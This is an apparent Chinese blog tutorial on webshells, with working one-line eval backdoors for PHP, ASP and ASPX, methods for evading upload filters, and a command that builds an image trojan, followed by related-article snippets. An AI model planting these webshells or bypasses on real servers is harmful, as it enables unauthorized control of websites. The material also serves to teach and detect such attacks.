小马和大马都是网页类型中的一种后门,是通过用来控制网站权限的,那最主要的区别就是小马是用来上传大马的。小马体积小,有比大马更强的隐蔽优势,而且有针对文件大小上传限制的漏洞,所以才有小马,小马也通常用来做留备用后门等
大马:辅助提权、执行sql语句、反弹shell、添加后门
webshell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。在国外,还有用python脚本语言写的动态网页,当然也有与之相关的webshell。 webshell根据功能也分为大马、小马和一句话木马,例如:<%eval request(“pass”)%>通常把这句话写入一个文档里面,然后文件名改成xx.asp。然后传到服务器上面。用eval方法将request(“pass”)转换成代码执行,request函数的作用是应用外部文件。这相当于一句话木马的客户端配置。.net要用aspx
php的一句话木马:<?php @eval($_POST['pass']);?>
asp的一句话是:<%eval request (“pass”)%>
aspx的一句话是:<%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>
只要攻击者满足三个条件,就能实现成功入侵:
(1)木马上传成功,未被杀;
(2)知道木马的路径在哪;
(3)上传的木马能正常运行。
一句话木马常见上传方式:免杀木马
利用00截断,brupsuite上传
构造服务器端扩展名检测上传
过Content-Type文件类型检测,就是用Burpsuite截取并修改数据包中文件的Content-Type类型,使其符合白名单的规则
一般文件内容验证使用getimeagesize()函数检测,会判断文件是否一个有效的文件图片,如果是,则允许上传,否则的话不允许上传。
制作图片木马: copy 1.jpg/b+2.php/a 3.jpg

如果想了解更多安全知识,或者有问题,都可以关注以下公众号,私信我:

一句话木马针对的不同框架使用相关推荐

  1. 文件上传一句话木马,用菜刀进行连接

    菜刀工具 提取码:tg6t 关于文件上传 文件上传是指由于网站没有任何过滤或者防护措施有限,而会被上传一些恶意文件,有些用户利用这个漏洞上传一句话木马(webshell),上传成功后就可以利用中国菜刀 ...

  2. php一句话怎么写_PHP一句话木马后门

    在我们进行渗透测试的最后阶段,入侵到内网里,无论是想要浏览网站结构,还是抓取数据库,或者是挂个木马等等,到最后最常用的就是执行一句话木马,从客户端轻松连接服务器. 一句话木马的原理很简单,造型也很简单 ...

  3. 利用动态二进制加密实现新型一句话木马之Java篇(转) 冰蝎

    概述 本系列文章重写了java..net.php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具.从而一劳永逸的绕过WAF或者其他网络防火墙的检测. 本来是想 ...

  4. 2018-03-24-利用动态二进制加密实现新型一句话木马之Java篇

    layout: post title: "利用动态二进制加密实现新型一句话木马-java篇" categories: [网络安全CyberSecurity] tags: [一句话木 ...

  5. 【原创】利用动态二进制加密实现新型一句话木马之Java篇

    概述 本系列文章重写了java..net.php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具.从而一劳永逸的绕过WAF或者其他网络防火墙的检测. 本来是想 ...

  6. 记一次对DZ的渗透.(一句话木马与图片,文件上传解析漏洞)

    一.举例:St0rs Team 指剑碎星河分享 前言0X01 某日某帅正在使用着啊D 入侵百度的时候, 突然某位好友发来一条消息. "滴滴上车" 打开消息一看,说是要某帅帮忙日一个 ...

  7. php7 一句话木马,PHP一句话木马后门

    在我们进行渗透测试的最后阶段,入侵到内网里,无论是想要浏览网站结构,还是抓取数据库,或者是挂个木马等等,到最后最常用的就是执行一句话木马,从客户端轻松连接服务器. 一句话木马的原理很简单,造型也很简单 ...

  8. php 一句话木马、后门

    强悍的PHP一句话后门 这类后门让网站.服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的.今天我们细数一些有意思的PHP一句话木马. 利用4 ...

  9. php webshell 木马,消灭php webshell与一句话木马

    总体来讲,对php webshell和一句话木马的查杀,主要从三个方面进行 1.Shell特征 2.PHP安全方面的函数和变量    以及安全配置选项 3.语法检测 首先,基于Shell特征,此方法主 ...

  10. java 菜刀_jsp一句话木马菜刀

    1.如何使用JSP一句话木马和菜刀木马 相信用过一句话木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站. 近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩 ...

最新文章

  1. 谷歌开源张量网络库TensorNetwork,GPU处理提升100倍!
  2. 如何优雅的实现 Spring Boot 接口参数加密解密?
  3. linux检查文件一致性,3.20 fsck(检查并修复Linux 文件系统)
  4. python date time
  5. android 调用红外模块,Flutter调用Android模块的功能
  6. 2017 ICPC西安区域赛 A - XOR ,线段树合并线性基
  7. php7与apache整合,apache集成php7.3.5的详细步骤
  8. C语言输入密码为6位,C语言中如何实现输入密码?(在输入时显示为*号.)
  9. Jquery学习总结(4)——高效Web开发的10个jQuery代码片段
  10. sphinx java_把 sphinx 官方提供的 java api 添加到 maven 库
  11. 看完你自己也能创建个小Linux
  12. Zabbix系统端口监控状态
  13. java数据库编程--执行数据库更新操作
  14. 6个工具让网页抓取变得轻而易举
  15. 爬虫日记(71):用OCR来对抗字体反爬
  16. 力扣(392.521)补8.26
  17. 【VRP问题】基于遗传算法求解带容量的VRP问题matlab源码
  18. 2023 年的 Web Worker 项目实践
  19. Linux的系统架构(linux由哪几部分组成?)
  20. [Angular] 使用 ng-alain

热门文章

  1. DM642图像处理程序的主要结构
  2. linux下client命令,Linux系统smbclient命令的使用方法
  3. datagrid删除所有行卡住_MySQL ------ 删除数据(DELETE) (二十二)
  4. 5. Keras - CNN应用于手写数字识别
  5. python大牛基础_十年Python大牛总结的python基础知识实例,快收藏!
  6. 【2019上海网络赛:D】Counting Sequences I(dfs+多重集合排列)
  7. 金融银行业机器学习—机遇、风险、案例
  8. button html ios,iOS实现UIButton图标和文字上下布局
  9. java jquery分页_如何最简单的实现java分页
  10. [codeup 2132] Repair the Wall